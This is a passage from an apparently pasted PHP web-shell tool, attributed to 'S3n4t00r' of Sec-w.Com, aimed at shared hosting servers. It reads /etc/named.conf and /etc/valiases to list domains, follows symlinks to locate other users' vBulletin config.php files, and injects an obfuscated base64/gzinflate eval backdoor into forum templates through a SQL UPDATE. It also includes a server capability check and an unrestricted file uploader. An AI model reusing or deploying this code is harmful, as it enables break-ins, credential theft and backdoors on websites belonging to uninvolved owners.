  1193. $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1194.  
  1195. $crypt = "{\${eval(gzinflate(base64_decode(\'";
  1196.  
  1197. $crypt .= "$shell";
  1198.  
  1199. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1200.  
  1201. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1202.  
  1203. $query = @mysql_query($sqlfaq,$con);
  1204.  
  1205.  
  1206.  
  1207. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1208.  
  1209. else
  1210.  
  1211. {
  1212.  
  1213. $r = '<b style="color:red">failed</b>';
  1214.  
  1215. }
  1216.  
  1217. $domins = trim($domin).'';
  1218.  
  1219. echo "<tr>
  1220. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1221. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1222.  
  1223.  
  1224.  
  1225.  
  1226.  
  1227.  
  1228.  
  1229. }else{
  1230.  
  1231. echo "<tr>
  1232. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1233. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1234. }
  1235.  
  1236. }
  1237.  
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247. die();
  1248.  
  1249. }
  1250.  
  1251. if(!is_file('named.txt')){
  1252.  
  1253. $d00m = file("/etc/named.conf");
  1254.  
  1255. }else{
  1256.  
  1257. $d00m = file("named.txt");
  1258.  
  1259.  
  1260. }
  1261. if(!$d00m)
  1262. {
  1263.  
  1264. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1265. }
  1266. else
  1267.  
  1268. {
  1269. echo "<div class='tmp'>
  1270. <form method='POST' action='$pg?sws=vb'>
  1271. <input type='submit' value='Inject shell' />
  1272. <input type='hidden' value='1' name='s' />
  1273. </form>
  1274. <br /><br />
  1275. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1276.  
  1277. $f = fopen('vb.txt','w');
  1278.  
  1279. foreach($d00m as $dom){
  1280.  
  1281. if(eregi("zone",$dom)){
  1282.  
  1283. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1284.  
  1285. if(strlen(trim($domsws[1][0])) > 2){
  1286.  
  1287. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1288.  
  1289. ///////////////////////////////////////////////////////////////////////////////////
  1290.  
  1291. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1292. $wpp=get_headers($wpl);
  1293. $wp=$wpp[0];
  1294.  
  1295. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1296. $wpp2=get_headers($wp2);
  1297. $wp12=$wpp2[0];
  1298.  
  1299. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1300. $wpp3=get_headers($wp3);
  1301. $wp13=$wpp3[0];
  1302.  
  1303.  
  1304. ////////// vb ////////////
  1305.  
  1306. $pos = strpos($wp, "200");
  1307. $config="&nbsp;";
  1308.  
  1309. if (strpos($wp, "200") == true )
  1310. {
  1311. $config= $wpl;
  1312. }
  1313. elseif (strpos($wp12, "200") == true)
  1314. {
  1315. $config= $wp2;
  1316. }
  1317. elseif (strpos($wp13, "200") == true)
  1318. {
  1319. $config= $wp3;
  1320. }
  1321. else
  1322. {
  1323. continue;
  1324.  
  1325. }
  1326. flush();
  1327.  
  1328. /////////////////////////////////////////////////////////////////////////////////////
  1329.  
  1330. $dom = $domsws[1][0];
  1331.  
  1332. $w = fwrite($f,"$config||$dom \n");
  1333. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1334.  
  1335.  
  1336. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1337. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1338.  
  1339.  
  1340.  
  1341.  
  1342.  
  1343. flush();
  1344.  
  1345.  
  1346. }
  1347. }
  1348. }
  1349. }
  1350.  
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356.  
  1357.  
  1358. break;
  1359.  
  1360. case 'help':
  1361.  
  1362. echo "<div class='tmp'>
  1363. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1364.  
  1365.  
  1366. $safe_mode = ini_get('safe_mode');
  1367. if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1368.  
  1369. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1370.  
  1371. $fun = function_exists('symlink');
  1372. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1373.  
  1374. echo "<tr><td>function symlink</td><td>$r</td>";
  1375.  
  1376.  
  1377. $fun = function_exists('file');
  1378. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1379.  
  1380. echo "<tr><td>function file</td><td>$r</td>";
  1381.  
  1382. $fun = function_exists('file_get_contents');
  1383. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1384.  
  1385. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1386.  
  1387. $fun = function_exists('mkdir');
  1388. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1389.  
  1390. echo "<tr><td>function mkdir</td><td>$r</td>";
  1391.  
  1392.  
  1393. $fun = is_dir('sym/root');
  1394. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1395.  
  1396. echo "<tr><td>Permission denied</td><td>$r</td>";
  1397.  
  1398.  
  1399. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1400. if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1401.  
  1402. echo "<tr><td>Forbidden</td><td>$r</td>";
  1403.  
  1404.  
  1405.  
  1406.  
  1407. echo "</table></div>";
  1408.  
  1409.  
  1410.  
  1411. break;
  1412. default:
  1413. header("Location: $pg");
  1414.  
  1415.  
  1416.  
  1417.  
  1418. }
  1419.  
  1420.  
  1421. /// home ///
  1422. }else
  1423. {
  1424.  
  1425.  
  1426. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1427. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1428. if( $_POST['_upl'] == "Upload" ) {
  1429. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1430. else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1431.  
  1432.  
  1433. }
  1434.  
  1435. echo '
  1436. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1437. <br /><br />
  1438. <b style="color: red";> Sec-w.Com </b>
  1439. <br /><br />
  1440. Muslims Hackers</div> ';
  1441.  
  1442. }
  1443.  
  1444.  
  1445. function ex($text,$a,$b){
  1446. $explode = explode($a,$text);
  1447. $explode = explode($b,$explode[1]);
  1448. return $explode[0];
  1449. }
  1450.  
  1451.  
  1452.  
  1453. echo '</div>
  1454.  
  1455. <a style="text-decoration: none; color: #F4F4F4;" title="ÇáÍãÇíå"/href="http://sec-w.com/cc">ÇáÍãÇíå</a>
  1456.  
  1457. <a style="text-decoration: none; color: #F4F4F4;" title="ÚÇáã ÇáÍãÇíå"/href="http://sec-w.com/cc">ÚÇáã ÇáÍãÇíå</a>
  1458.  
  1459.  
  1460.  
  1461. </body>
  1462.  
  1463. </html>
  1464. ';
  1465.  
  1466. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!